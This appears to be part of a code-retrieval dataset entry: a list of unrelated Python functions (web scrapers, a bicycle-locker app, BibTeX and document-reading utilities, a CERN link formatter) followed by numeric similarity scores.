"def __bol(soup):\n news = []\n anchors = soup.find('ul', class_='maisclicadas').find_all('a')\n\n for a in anchors:\n title = a.span.string.next\n link = a['href']\n news.append(dict(title=title, link=link))\n return news", "def get_dic_codebook(code_book, graphlets, create_graphlet_images=False):\n dictionary_codebook = dict(zip(code_book, graphlets))\n\n # dictionary_codebook = {}\n # for hash, graph in zip(code_book, graphlets):\n # dictionary_codebook[g_name] = graph\n if create_graphlet_images:\n image_path = '/home/' + getpass.getuser() + '/Dropbox/Programming/topics_to_language/LDAvis_images'\n create_codebook_images(dictionary_codebook, image_path)\n return dictionary_codebook", "def get_dic_codebook(code_book, graphlets, create_graphlet_images=False):\n 
dictionary_codebook = dict(zip(code_book, graphlets))\n\n # dictionary_codebook = {}\n # for hash, graph in zip(code_book, graphlets):\n # dictionary_codebook[g_name] = graph\n if create_graphlet_images:\n image_path = '/home/' + getpass.getuser() + '/Dropbox/Programming/topics_to_language/LDAvis_images'\n create_codebook_images(dictionary_codebook, image_path)\n return dictionary_codebook", "def __local_ba(soup):\n news = []\n ns = get_ns('localBA')\n\n anchors = soup.find('aside', id='conteudos').find_all('a')\n\n for a in anchors:\n title = a.string\n link = ns.url + a['href']\n news.append(dict(title=title, link=link))\n return news", "def kluisVrijgeven():\r\n kluisDict = dictionary()\r\n beginSchermTopTitel['text'] = ''\r\n beginSchermTerug.grid(pady=3, padx=(10, 10), sticky='w', row=1)\r\n\r\n with open('FietsStalling.txt', 'r+') as readFile:\r\n for kluis in kluisDict:\r\n try:\r\n if kluisDict[kluis] is not None and int(beginSchermEntry.get()) in kluisDict[kluis]: # kluis zoeken\r\n # in dictionary\r\n kluisDict[kluis] = None\r\n beginSchermTitel['text'] = 'Kluis nummer ' + str(kluis) + ' is vrijgegeven'\r\n readFile.truncate(0)\r\n readFile.seek(0)\r\n for item in kluisDict: # bestand updaten (vrijgegeven kluis verwijderen)\r\n if kluisDict[item] is not None:\r\n readFile.write(str(item) + '; ' + ''.join(str(kluisDict[item])).strip('{}()\\'\\'')\r\n .replace('\\'', '') + '\\n') # bezette kluizen naar bestand schrijven\r\n beginSchermEntry.delete(0, END)\r\n return\r\n except ValueError:\r\n beginSchermTitel['text'] = 'Geen geldige invoer'\r\n return\r\n beginSchermTitel['text'] = 'Dit OV nummer is onbekend'\r\n return", "def ingredient_db():\n # type: () -> List[Text]\n return [\"abricot\",\n \"banane\",\n \"cassis\",\n \"cerise\",\n \"citron\",\n \"clémentine\",\n \"coing\",\n \"fraise\",\n \"framboise\",\n \"groseille\",\n \"mirabelle\",\n \"mûre\",\n \"myrtille\",\n \"nectarine\",\n \"orange\",\n \"pamplemousse\",\n \"pomelo\",\n \"pêche\",\n \"poire\",\n \"pomme\",\n \"prune\",\n \"pruneau\",\n \"raisin\",\n \"rhubarbe\",\n \"ananas\",\n \"figue\",\n \"fruit de la passion\",\n \"goyave\",\n \"grenade\",\n \"kaki\",\n \"kiwi\",\n \"kumquat\",\n \"litchi\",\n \"mangue\",\n \"melon\",\n \"papaye\",\n \"pastèque\",\n \"vanille\",\n \"amande\",\n \"datte\",\n \"noisette\",\n \"artichaut\",\n \"aubergine\",\n \"asperge\",\n \"avocat\",\n \"betterave\",\n \"blette\",\n \"brocoli\",\n \"banane plantain\",\n \"carotte\",\n \"cardon\",\n \"céleri rave\",\n \"céleri branche\",\n \"champignon\",\n \"champignon de paris\",\n \"chou blanc\",\n \"chou rouge\",\n \"chou de bruxelles\",\n \"chou-fleur\",\n \"citrouille\",\n \"concombre\",\n \"courge\",\n \"courgette\",\n \"crosne\",\n \"echalote\",\n \"epinard\",\n \"endive\",\n \"fenouil\",\n \"haricot vert\",\n \"haricot\",\n \"navet\",\n \"oignon\",\n \"oseille\",\n \"panais\",\n \"pâtisson\",\n \"petit pois\",\n \"poireau\",\n \"poivron\",\n \"potiron\",\n \"radis rouge\",\n \"rutabaga\",\n \"navet\",\n \"salade \",\n \"salsifis\",\n \"tomate\",\n \"topinambour\",\n \"maïs\"]", "def foto_like():\r\n fotky = []\r\n for i in xrange(1,100000):\r\n try:\r\n pg = urllib2.urlopen(base + '%s'%i).read()\r\n print i\r\n except:\r\n break\r\n soup = BeautifulSoup(pg)\r\n fotos = soup.find_all('div', 'copy')\r\n if not len(fotos):\r\n break\r\n for foto in fotos:\r\n for sibling in foto.next_siblings:\r\n if isinstance(sibling, Tag) and sibling.name=='a':\r\n notes = sibling.find_all('div', 'notes')[0].text.strip()\r\n try:\r\n pocet = 
int(notes.rsplit(' ', 1)[0].replace(' ','')) \r\n except ValueError:\r\n # print '???', notes\r\n pocet = 0\r\n fotky.append((sibling['href'], pocet, notes, len(notes)))\r\n # 2,3: pro kontrolu správnosti celý text (notes) a jeho délka \r\n print 'stránek :', i-1\r\n print 'fotek :', len(fotky)\r\n return fotky", "def af_list(self) -> List:\n ...", "def make_bib(bib_name, new_bib_name):\n print(\"Saving new Bib File..\")\n \"\"\"read in bibtex file\"\"\"\n print(\"Reading BibTex File: {}\".format(bib_name))\n curdir = osp.abspath('.')\n bib_path = osp.join(curdir, bib_name)\n save_path = osp.join(curdir, new_bib_name)\n with open(bib_path, 'r') as f:\n with open(save_path, 'a') as f_new:\n line = f.readline()\n f_new.write(line)\n filename=None\n while line:\n if line.find('@')==1: # reading entry\n filename = get_name(line)\n if line.find('title')==1:\n link = get_link(line)\n new_link = osp.join('library', filename+'.pdf')\n new_title = get_title(line)\n new_title = '{'+new_title+'}'\n new_link = '\\href{run:'+new_link+'}'\n new_title = new_link+new_title\n new_title = '\\ttitle={}'.format('{'+new_title+'},\\n')\n if link is not None:\n line = new_title\n f_new.write(line)\n line = f.readline()\n print(\"Saved {}\".format(new_bib_name))", "def __init__(self, kegg_brite, obj_level_url_fmt=None,\n path_level_url_fmt=None, org_prefix=None):\n\n self.org_prefix = org_prefix\n self.namespace = None\n self.index2terms = []\n self.term2type = {}\n self.terms = {}\n self.term2parent = self._load_brite(kegg_brite)\n self.obj_level_url_fmt = obj_level_url_fmt\n self.path_level_url_fmt = path_level_url_fmt\n self.term2index = \\\n dict((t, i) for i, t in enumerate(self.index2terms))", "def some_docs(a_dir_path, test_mode=False):\n\ttry:\n\t\tbibfiles = [path.join(a_dir_path,fi) for fi in listdir(a_dir_path)]\n\texcept:\n\t\twarn(\"le dossier %s n'existe pas\" % a_dir_path)\n\t\texit(1)\n\n\tif test_mode:\n\t\t# pour les tests (on fait 3 docs différents à chaque fois)\n\t\tshuffle(bibfiles)\n\t\tthe_files = bibfiles[0:3]\n\n\t\twarn(\"= + = + = + = + = + = + = + = + = + = + = + = + = + = + = + = + = + = + =\")\n\t\twarn(\"TEST_FILES %s\" % the_files)\n\telse:\n\t\tthe_files = bibfiles\n\n\treturn the_files", "def intercambiar(mapa, mapa2):\n for e in mapa.bloqueadas:\n mapa2.bloqueadas.append(e)", "def index_gcis(gcis_url, es_url, index, alias, dump_dir):\n conn = get_es_conn(es_url, index, alias)\n refList = get_refList(dump_dir)\n art_path = \"%s/article/\"%(dump_dir)\n for (root,dirs,files) in os.walk(art_path):\n for f in files:\n f = \"%s%s\"%(art_path, f)\n print(\"f: %s\" % f)\n with open(f) as item:\n article = json.load(item)\n prov = get_doc_prov(article, gcis_url, refList)\n print(\"prov: %s\" % json.dumps(prov, indent=2))\n import_prov(conn, index, alias, prov)", "def kluisOpenen():\r\n kluisDict = dictionary()\r\n beginSchermTopTitel['text'] = ''\r\n beginSchermTerug.grid(pady=3, padx=(10, 10), sticky='w', row=1)\r\n\r\n for kluis in kluisDict:\r\n try:\r\n if kluisDict[kluis] is not None and int(beginSchermEntry.get()) in kluisDict[kluis]: # kluis zoeken in\r\n # dictionary\r\n beginSchermTitel['text'] = 'Kluis nummer ' + str(kluis) + ' is geopend'\r\n beginSchermEntry.delete(0, END)\r\n return\r\n except ValueError:\r\n beginSchermTitel['text'] = 'Geen geldige invoer'\r\n return\r\n beginSchermTitel['text'] = 'Dit OV nummer is onbekend'\r\n return", "def sprawdz(lista):\n # do_usuniecia - lista zawierajaca indeksy pol ktore zostana usuniete z glownej listy\n do_usuniecia = []\n # 
petla przechodzaca po wartosciach\n for i in range(len(lista) / 2):\n # j - indeks wartosci dla poszczgolnego panstwa\n j = 2 * i + 1\n # k - indeks pod ktorym nie ma wartosci\n k = 0\n # sprawdzanie ktore elementy sa bez wartosci oraz dodawanie ich do listy do usuniecia\n for el in lista[j]:\n if el is None:\n # zastosowanie unikalnosci indeksow\n if not k in do_usuniecia:\n do_usuniecia.append(k)\n\n k += 1\n # sortowanie listy z indeksami do usuniecia w sposob rosnacy\n do_usuniecia.sort()\n # nowalista - lista zawierajaca statystyki dostepne dla wszystkich panstw odpowiednio [Lata],[Wartosc]\n nowalista = []\n for i in range(len(lista)):\n # wartosc - lista zawierajaca poszczegolne dane z glownej listy\n wartosc = []\n # dodawanie wartosci, ktore sa dostepne dla wszystkich panstw do tabeli wartosc\n for j in range(len(lista[i])):\n # zastosowanie unikalnosci indeksow dla ktorych nie ma wartosci\n if not j in do_usuniecia:\n wartosc.append(lista[i][j])\n # dodawanie listy zawierajacej wynik dla poszczegolnych danych\n nowalista.append(wartosc)\n\n return nowalista", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def documento():\r\n\tpass", "def kluisAanvragen():\r\n kluisDict = dictionary()\r\n beginSchermTopTitel['text'] = ''\r\n beginSchermTerug.grid(pady=3, padx=(10, 10), sticky='w', row=1)\r\n\r\n try:\r\n if len(beginSchermEntry.get()) == 16:\r\n for getal in kluisDict:\r\n if kluisDict[getal] is not None and kluisDict[getal][1] == int(beginSchermEntry.get()):\r\n beginSchermTitel['text'] = 'Je hebt al een kluis: nummer ' + str(getal)\r\n return\r\n\r\n with open('FietsStalling.txt', 'r+') as readFile:\r\n for kluis in kluisDict:\r\n if kluisDict[kluis] is None: # kluis toewijzen\r\n beginSchermTitel['text'] = 'Kluis nummer ' + str(kluis)\r\n kluisDict[kluis] = (time.strftime('%d-%m-%Y %H:%M'),\r\n int(beginSchermEntry.get())) # value wordt tijd en OV\r\n readFile.truncate(0)\r\n readFile.seek(0)\r\n for item in kluisDict: # bestand updaten (nieuwe kluis toevoegen)\r\n if kluisDict[item] is not None:\r\n readFile.write(str(item) + '; ' + ''.join(str(kluisDict[item])).strip('{}()\\'\\'')\r\n .replace('\\'', '') + '\\n')\r\n beginSchermEntry.delete(0, END)\r\n return\r\n beginSchermTitel['text'] = 'Geen kluizen vrij'\r\n return\r\n else:\r\n beginSchermTitel['text'] = 'Geen geldige invoer'\r\n return\r\n except ValueError:\r\n beginSchermTitel['text'] = 'Geen geldige invoer'\r\n return", "def references_list( self, theWeaver ):\n return [ (c.name, c.seq) \n for c in theWeaver.reference_style.chunkReferencedBy( self ) ]", "def read_documents(file_path: str) -> List[Tuple[str, List[Tuple[str, List[str]]]]]:\n print(f'Reading SciREX documents from {file_path}')\n with open(file_path, 'r') as json_file:\n json_list = list(json_file)\n\n papers = []\n for json_str in json_list:\n papers.append(json.loads(json_str))\n\n def find_index_in_array(index, array):\n for array_index, (start, end) in enumerate(array):\n if end > index:\n return array_index\n\n result = []\n for paper in papers:\n result_sections = []\n\n # Populate the sentences list with section information.\n for index, section in enumerate(paper['sections']):\n # Get the first sentence of the section.\n index = find_index_in_array(section[0], paper['sentences'])\n sentence = paper['sentences'][index]\n # The section name is the first sentence of the section.\n section_name = paper['words'][sentence[0]:sentence[1]]\n\n # Example for the first sentence on a section:\n # [\"section\", \":\", 
\"Abstract\"]\n # If the first sentence starts with [\"section\", \":\"], we are only interested in the words after that prefix.\n if len(section_name) >= 2 and section_name[1] == \":\":\n section_name_length = len(section_name)\n section_name = section_name[2:]\n else:\n section_name_length = 0\n if index == 0:\n # First section will always be labled as 'Title'\n section_name = ['Title']\n else:\n section_name = []\n\n result_sections.append((\" \".join(section_name), []))\n\n words = paper['words']\n for info in paper['sentences']:\n sentence = words[info[0]:info[1]]\n section_index = find_index_in_array(info[0], paper['sections'])\n\n result_sections[section_index][1].append(\" \".join(sentence))\n\n result.append((str(paper['doc_id']), result_sections))\n\n return result", "def __init__(self):\n self.liste = []", "def initialize_children(self, bibs):\n\t\tpass", "def addPublication():\n preloaded = [\n {\"description\": \"bortaS <b>bIr</b> jablu'DI' reH QaQqu' nay'!\"},\n {\"language\": \"en\"},\n {\"country\": \"usa\"}\n ]\n return render_template(\"addPublication.html\", msg=\"\", preloaded=preloaded)", "def get_listu_uredjaja(self):\n lista = sorted(list(self.uredjaji.keys()))\n return lista", "def format_element(bfo, style, separator='; ', elec_loc_field='1'):\n\n urls = []\n coll = bfo.field('960__a')\n\n if '1' in elec_loc_field:\n urls = bfo.fields('8564_')\n\n if '2' in elec_loc_field:\n urls.extend(bfo.fields('85642'))\n\n out = []\n\n if style != \"\":\n style = 'class=\"'+style+'\"'\n\n for url in urls:\n if coll in ['31', '32'] and \\\n url.get('x', '') == 'map':\n # Periodicals\n continue\n\n elif coll in ['74', '75'] and \\\n 'BUL-SA-' not in bfo.field('037__a') and \\\n bfo.field('088__a'):\n # Weekly bulletin\n continue\n\n\n elif url.has_key('u'):\n\n label = url.get('y', '')\n if coll in ['60', '61', '62', '63', '69'] or \\\n coll in ['81', '82', '83', '84', '86','87','88', '89', '115', '117']:\n # Council documents +\n # Photos\n label = escape(url.get('z', ''))\n if label.lower() in ['', 'access to fulltext document', 'access to document', 'full text']:\n label = \"Fulltext\"\n if label.lower() in ['audio files']:\n label = '<img src=http://cdsweb.cern.ch/img/speaker.png border=\"0\">' + \\\n label\n\n\n link = '<a ' + style + ' href=\"' + url['u'] + '\">' + \\\n label + '</a>'\n out.append(link)\n\n if coll == '05':\n file_numbers = bfo.field('927__a')\n for file_number in file_numbers:\n if '-' in file_number or '_' in file_number:\n link = '<a href=\"http://doc.cern.ch/cgi-bin/setlink?base=pauli&amp;categ=&amp;id=\"%s\">Fulltext</a>' % file_number\n out.append(link)\n\n if coll in ['74', '75'] and \\\n 'BUL-SA-' not in bfo.field('037__a') and \\\n bfo.field('088__a'):\n # Weekly bulletin\n link = 'Published in <a href=\"http://bulletin.cern.ch/eng/bulletin.php?bullno=' + \\\n bfo.field('088__a') +'\">CERN weekly bulletin ' + bfo.field('088__a') + '</a>' + \\\n ' (' + bfo.field('260__c') + ')'\n out.append(link)\n\n return separator.join(out)", "def bib_sublist(bibfile_data, val_type):\n sublist = [bibfile for bibfile in bibfile_data if isinstance(bibfile.bib, val_type)]\n return sublist", "def _browse_to_terms(self):\n lang = self.ddnGuiLanguage.get()\n\n filein = filedialog.askopenfilename(\\\n filetypes=[('Paratext Biblical Terms', '.htm'), ], \\\n initialdir=self.BibTerm, \\\n initialfile='', \\\n title=LOCALIZED_TEXT[lang]['Paratext Biblical Terms'], \\\n defaultextension='.htm')\n self.terms_in.set(filein)\n if self.ddnCurProject.get() \\\n and 
self.dict_in.get() and self.terms_in.get():\n self.btnSaveProject['state'] = 'normal'\n self._change_lang()\n pass", "def get_bibtex(self, arg=None):\n getter = self.get_getter()\n if getter is None:\n return\n if not arg:\n arg = self.visual.ask_user(f\"Search what on the web?\", multichar=True)\n if not arg:\n self.visual.error(\"Nothing entered, aborting.\")\n return\n try:\n res = getter.get_web_bibtex(arg)\n except Exception as ex:\n self.visual.error(\"Failed to complete the query: {}.\".format(ex))\n return\n if not res:\n self.visual.error(\"No data retrieved.\")\n return\n\n reader2 = Reader(self.config)\n read_entries_dict = reader2.read_entry_list(res)\n self.visual.log(\"Retrieved {} entry item(s) from query [{}]\".format(len(read_entries_dict), arg))\n\n # select subset\n if len(read_entries_dict) > 1:\n ids, content = list(zip(*[(e.ID, e.get_discovery_view()) for e in read_entries_dict.values()]))\n _, selected_ids = self.visual.user_multifilter(content, header=Entry.discovery_keys, reference=ids)\n selected_entries = [v for (k, v) in read_entries_dict.items() if k in selected_ids]\n else:\n selected_entries = list(read_entries_dict.values())\n if not selected_entries:\n return\n self.visual.print_entries_contents(selected_entries)\n\n res = self.visual.ask_user(\"Store?\", \"*yes no-but-keep quit\")\n if utils.matches(res, \"yes\"):\n selected_ids = []\n for entry in selected_entries:\n created_entry = self.entry_collection.add_new_entry(entry)\n if created_entry is None:\n self.visual.error(f\"Entry {entry.ID} already exists in the collection!\")\n else:\n selected_ids.append(created_entry.ID)\n elif utils.matches(res, \"no-but-keep\"):\n selected_ids = [x for x in selected_entries]\n elif utils.matches(res, \"quit\"):\n return\n if not selected_ids:\n return\n if self.visual.yes_no(\"Select it?\"):\n self.selector.select_by_id(selected_ids)\n\n # pdf\n what = self.visual.ask_user(\"Pdf?\", \"local url web-search *skip\")\n if utils.matches(what, \"skip\"):\n return\n if utils.matches(what, \"url\"):\n self.get_pdf_from_web()\n return\n if utils.matches(what, \"local\"):\n self.set_local_pdf_path()\n return\n if utils.matches(what, \"web-search\"):\n self.search_web_pdf()", "def show_research(self):\n self.list_research = orm_imp.read_research()\n print(\"========================================================\")\n for row in self.list_research:\n print(\n row[\"date\"], \"|| Produit :\", row['subcat'],\n \"|| Meilleure proposition :\", row['product'], \"| Score :\",\n row['nutriscore'], \"| Lien :\", row['url'],\n \"| Ingrédients :\", row['ingredient'])\n print(\"========================================================\")", "def get_clean_bib(bib):\n d = PyQuery(bib)\n div = d(\"div.csl-right-inline\").html()\n\n # zotero keeps the html escaped in the return value\n div = parser.unescape(div)\n\n return hyperlink_string(div)", "def get_listu_dilucijskih_jedinica(self):\n popis = sorted(list(self.dilucijskeJedinice.keys()))\n return popis", "def __init__(self):\n self.g_sect = []", "def get_bibfiles(folder: str) -> t.List[str]:\n full_pathname = os.path.normpath(os.path.abspath(folder))\n bib_files = []\n for f in os.listdir(full_pathname):\n fullname = os.path.join(full_pathname, f)\n if f.endswith(\".bib\") and os.path.isfile(fullname):\n logging.debug(f'get bibfile \"{f}\" from directory \"{full_pathname}\"')\n bib_files.append(fullname)\n return bib_files", "def list(self):" ]
[ "0.5889567", "0.556562", "0.550952", "0.5432978", "0.535185", "0.52912766", "0.52754295", "0.5218949", "0.5215099", "0.51674855", "0.5162123", "0.51455015", "0.5136601", "0.512709", "0.5073164", "0.5071011", "0.5048508", "0.50347453", "0.503294", "0.50080127", "0.49941462", "0.4989685", "0.4972051", "0.49277106", "0.49242613", "0.49061197", "0.49035367", "0.49002993", "0.48921725", "0.48729238", "0.48662493", "0.4855849", "0.48554122", "0.48414177", "0.48302987", "0.4830171", "0.48235372", "0.48198304", "0.48152983", "0.48090243", "0.4807784", "0.48054036", "0.4793097", "0.47849", "0.47608775", "0.47415623", "0.47291327", "0.47185707", "0.47150356", "0.47147822", "0.4710178", "0.4696916", "0.46941406", "0.4680901", "0.46803892", "0.4676737", "0.46757814", "0.46742636", "0.46694112", "0.46627638", "0.46602455", "0.46525687", "0.4649886", "0.46478537", "0.46421415", "0.462788", "0.4627191", "0.46178472", "0.46094248", "0.46094248", "0.46053982", "0.45907706", "0.45816734", "0.45767748", "0.4574225", "0.4566661", "0.45623016", "0.45606303", "0.455713", "0.45489076", "0.45461923", "0.45405787", "0.45373577", "0.4535609", "0.4534532", "0.4531824", "0.45317477", "0.45268947", "0.45258078", "0.45212606", "0.45197362", "0.45189", "0.45170644", "0.4512629", "0.45124143", "0.45027372", "0.44837812", "0.44812965", "0.44806042", "0.44789615", "0.44781283" ]
0.0
-1
multiply mx + b
def __init__(self, alphabet, m, b): # We're cheating here by not actually having the decryption method use the "inverse" argument transformed = alphabet.affinal(m, b) super(AffineCipher, self).__init__(alphabet, transformed)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mul(self, a, b):\n return a * b", "def multiply(self, a, b):\n return a * b", "def addmul(a,b):\n return a*b+a*b", "def mul(a,b):\r\n return a*b", "def matmul(a, b):\n raise NotImplementedError", "def mul(x, y):\n return multiply(x, y)", "def _mul(a, b):\n return a * b", "def multiply(x, y):\n\n return x * y", "def mul(a,b):\n return [a[0]*b[0],a[1]*b[1],a[2]*b[2],1.0]", "def mul(a, b):\n c = Calculator()\n result = c.mul(a, b)\n click.echo('{} * {} = {}'.format(a, b, result))", "def mul(A, b):\n return A.from_rep(A.rep.mul(b))", "def mul(Z,X,Y):", "def multiply(a, b):\n return a * b", "def multiply(a, b):\n return a * b", "def multiply(a, b):\n return a * b", "def multiply(a, b):\n return a * b", "def multiply(a, b):\n return a * b", "def __mul__(self,that):\n return self.__opExpand2(that, np.multiply)", "def mul(self, b):\n self.a *= float(b)", "def multiplicacion(x, y):\n return x * y", "def mult(a, b):\n return a * b", "def multiplication(a, b):\n pass", "def multiply(x, y):\n return x * y", "def multiply(x, y):\n return x * y", "def multiply(x, y):\n return x * y", "def multiplication(a, b):\n return a * b", "def multiply(a, b):\n return a*b", "def multiply(a,b):\n return a*b", "def mul(x, y):\n return x * y", "def mul(x, y):\n return x * y", "def _mul(*args):\n\treturn functools.reduce(numpy.dot, args)", "def multiplier(self) -> global___Expression:", "def my_matmul(x, y):\n ##\n cmd = getattr(th, \"matmul\")\n x1, x2 = my_cut(x)\n y1, y2 = my_cut(y)\n x2y1 = cmd(x2, y1)\n x1y2 = cmd(x1, y2)\n x2y2 = cmd(x2, y2)\n ret = (x2y1 + x1y2) % int24field * int24field + x2y2\n ret = int48module(ret)\n return ret", "def f(m, x, b):\n return m*x + b", "def my_mul(x, y):\n ##\n cmd = getattr(th, \"mul\")\n x1, x2 = my_cut(x)\n y1, y2 = my_cut(y)\n x2y1 = cmd(x2, y1)\n x1y2 = cmd(x1, y2)\n x2y2 = cmd(x2, y2)\n return int48module((x2y1 + x1y2) % int24field * int24field + x2y2)", "def matrix_mult(m1, m2):\n pass", "def __mul__(self,a):\n return Vector(self.x*a,self.y*a)\n pass", "def __mul__(self, othertr):\n res = self.dot(othertr)\n return res", "def lazy_matrix_mul(m_a, m_b):\n return np.dot(m_a, m_b)", "def multiply(first, second):\n return first * second", "def mul(a: Decimal, b: Decimal) -> Decimal:\n return a * b", "def multiplies(x, y):\n x[:] *= y[:]\n return x", "def multiply(x, y):\n result = x * y\n return result", "def product(a, b):\n return a * b", "def multiply(self, b):\n assert(self.Dimension == b.Dimension)\n p = []\n for meb in b.Elements:\n for mea in self.Elements:\n if mea.j == meb.i:\n temp = mea.val * meb.val\n temp = MatrixElement(mea.i, meb.j, temp)\n p.append(temp)\n p = SparseMatrix(len(p), p)\n #print(p)\n return p", "def matmul(x, y):\n return np.matmul(x, y)", "def mul_inplace(a, b):", "def matMul(a, b):\n sa=matShape(a)\n sb=matShape(b)\n if sa[1]!=sb[0]: raise ValueError\n ret=matZeros((sa[0],sb[1]))\n for i in range(sa[0]):\n for j in range(sb[1]):\n val=0.0\n for k in range(sa[1]):\n val+=matGet(a,i,k)*matGet(b,k,j)\n matSet(ret,i,j,val)\n return ret", "def mul(self, a: 'PFElement', b: 'PFElement') -> 'PFElement':\n return self(self._pf_mul(a.value, b.value, self.multiplicative_group))", "def multiply(t):\n return mul(*t)", "def __mul__(self,l):\r\n\t\t\r\n\t\t# multiply\r\n\t\tm = self.multiply(l)\r\n\t\t\r\n\t\treturn m", "def multiply(lhs, rhs):\n return _make.multiply(lhs, rhs)", "def __mul__(self, o): \n return MoebGen(self._a * o.a + self._b * o.c, self._a * o.b + self._b * o.d, \n self._c * o.a + self._d * o.c, self._c * o.b + self._d * o.d)", "def 
__mul__(self, A):\n pass", "def multiply(self, layer):\n pass", "def __mul__(self, other):\r\n return self.prod(other)", "def mul(self):\n a = self.pop()\n b = self.pop()\n c= a*b\n self.push(c)", "def lin(x, m, b):\n return m*x + b", "def __matmul__(self, q: np.ndarray) -> np.ndarray:\n return self.product(q)", "def __matmul__(self, B):\n m, n = self.shape\n n_, r = B.shape\n assert n == n_, (\"Cannot multiply shapes \"\n \"({}, {}) and ({}, {})\".format(m, n, n_, r))\n mul_ = dict()\n # compute A_ik = sum_j A_ij*B_jk\n for i in range(m):\n for k in range(r):\n prod = mpfr(0)\n for j in range(n):\n prod += self[i, j] * B[j, k]\n mul_[i, k] = prod\n return MPMatrix((m, r), mul_)", "def __mul__(self,y): \n\n # BZO mulitplication\n if type(y)==type(self):\n Out = self._CreateSameType()\n \n for Ind1 in self.IndList():\n Obj1=self[Ind1]\n for Ind2 in y.IndList():\n Obj2=y[Ind2]\n \n Ind3 = tuple(add(Ind1,Ind2))\n \n Out[Ind3] += Obj1*Obj2\n \n # Scalar multiplicatin\n else:\n\n Out = self._CreateSameType()\n\n Out.SetLists(self.IndList(),[y*x for x in self.__ObjList])\n\n # Multiplication with item of its own type\n \n \n \n \n \n return Out", "def __mul__(self,m):\n if type(m) != Matrix:\n raise TypeError('The second argument is not a matrix lol')\n if self.ncols != m.nrows:\n raise ValueError('matrix dot argument has incorrect number of rows')\n new = Matrix(self.nrows,m.ncols)\n columns = m.getCols()\n rowindex = 0\n colindex = 0 \n for row in self.matrix:\n colindex = 0 \n for col in columns:\n summ = 0\n for i,j in zip(row,col):\n summ+= i*j \n new.matrix[rowindex][colindex] = summ\n print new.matrix\n colindex += 1 \n rowindex+=1\n return new", "def multiply(n1, n2):\n return n1 * n2", "def lazy_matrix_mul(m_a, m_b):\n m_a = np.array(m_a)\n m_b = np.array(m_b)\n\n return m_a.dot(m_b)", "def dot4(a,b):\n return a[0]*b[0]+a[1]*b[1]+a[2]*b[2]+a[3]*b[3]", "def lazy_matrix_mul(m_a, m_b):\n return (np.matmul(m_a, m_b))", "def product(num_a, num_b):\r\n return num_a*num_b", "def multiply(x, y):\n result = 0\n for _ in range(abs(y)):\n result = add(result, x)\n return -result if y < 0 else result", "def __mul__(self, b):\n try:\n b = float(b)\n return Vector(self.x * b, self.y * b)\n except ValueError:\n raise ValueError(\"Right value must be castable to float, was {}\".format(b))", "def multiplication(self, a, b):\n if not check_arguments(a, b): # check if arguments are numbers\n self.last_result = a * b", "def product(self, x, y):\n return self( x.lift() * y.lift() )", "def multiply(x, y):\n if y == 1: return x\n t = multiply(x, y >> 1)\n t *= 2\n if y & 1:\n t += x\n return t", "def __call__(self, a, b):\n self.a = a\n self.b = b\n return a.data * b.data", "def complex_mul2d(a, b):\n op = partial(torch.einsum, \"bixy,ioxy->boxy\")\n return torch.stack([\n op(a[..., 0], b[..., 0]) - op(a[..., 1], b[..., 1]),\n op(a[..., 1], b[..., 0]) + op(a[..., 0], b[..., 1])\n ],\n dim=-1)", "def ndom_multiply (a, b):\r\n x=ndom_to_decimal(a)\r\n y=ndom_to_decimal(b)\r\n multi=x*y\r\n mab=decimal_to_ndom(multi)\r\n return mab", "def lazy_matrix_mul(m_a, m_b):\n return np.matmul(np.array(m_a), np.array(m_b))", "def complex_mul1d(a, b):\n op = partial(torch.einsum, \"bix,iox->box\")\n return torch.stack([\n op(a[..., 0], b[..., 0]) - op(a[..., 1], b[..., 1]),\n op(a[..., 1], b[..., 0]) + op(a[..., 0], b[..., 1])\n ],\n dim=-1)", "def _multiply(a, b, r):\n p = 0\n while b:\n if b & 1:\n p ^= a\n b >>= 1\n a <<= 1\n if a & 256:\n a ^= r\n return p & (256 - 1)", "def dot(a,b):\n return 
a[0]*b[0]+a[1]*b[1]+a[2]*b[2]", "def multiply(a: int, b: int) -> int:\n return a * b", "def product1(a, b, c) :\n return a * b * c", "def multiply(a, b):\n columns_of_a = len(a[0])\n lines_of_b = len(b)\n if columns_of_a != lines_of_b:\n # Check matrix dimensions\n print \"Incompatible sizes!\"\n else:\n lines_of_a = len(a)\n columns_of_b = len(b[0])\n #C = []\n #for i in range (lines_of_a):\n # C.append(columns_of_b * [0])\n c = [columns_of_b * [0] for i in range(lines_of_a)]\n for i in range(lines_of_a):\n for j in range(columns_of_b):\n for k in range(lines_of_b):\n c[i][j] += a[i][k] * b[k][j]\n return c", "def multiply(x, y):\n value = 0\n print(x)\n print(y)\n for _ in range(abs(y)):\n value = add(value, x)\n if y < 0:\n value = -value\n return value", "def dot_product(a,b):\n return sum(pairwise_mult(a,b))", "def multiply(x, y):\n result = 0\n for _ in range(abs(y)):\n if y >= 0:\n result = add(result, x)\n else:\n result = add(result, -x)\n return result", "def __imul__(self,that):\n #return self.__opExpand1(that,np.multiply, out=self)\n return self.__opExpand2(that,np.multiply, out=self)", "def fun4(a,b):\n mul=a*b\n return mul", "def mul_numbers(a: int, b: int) -> int:\n return a * b", "def inner(self, a: np.ndarray, b: np.ndarray) -> float:\n return a.T @ (self.mass @ b)", "def dot(a, b):\n return a[0]*b[0] + a[1]*b[1] + a[2]*b[2]", "def box_mul():\n\tu0=r.uniform(0,1)\n\tu1=r.uniform(0,1)\n\tz0 = m.sqrt((-2) * m.log(u0)) * m.cos(2 * m.pi * u1)\n\tz1 = m.sqrt((-2) * m.log(u0)) * m.sin(2 * m.pi * u1)\n\treturn (z0, z1)", "def val_mul(self, a):\n f = self.to_Poly()\n return f.val_mul(a).to_PolyMesh(self.params)", "def __rmul__(self,that):\n return self.__opExpand2(that, np.multiply)", "def recursive_multiply(a, b):\n if len(a) == 2:\n return naive_multiply(a, b)\n\n a11 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a11):\n a11[index] = row[0:int(len(row) / 2)]\n\n a12 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a12):\n a12[index] = row[int(len(a) / 2):len(a)]\n\n a21 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a21):\n a21[index] = row[0:int(len(row) / 2)]\n\n a22 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a22):\n a22[index] = row[int(len(a) / 2):len(a)]\n\n b11 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b11):\n b11[index] = row[0:int(len(row) / 2)]\n\n b12 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b12):\n b12[index] = row[int(len(b) / 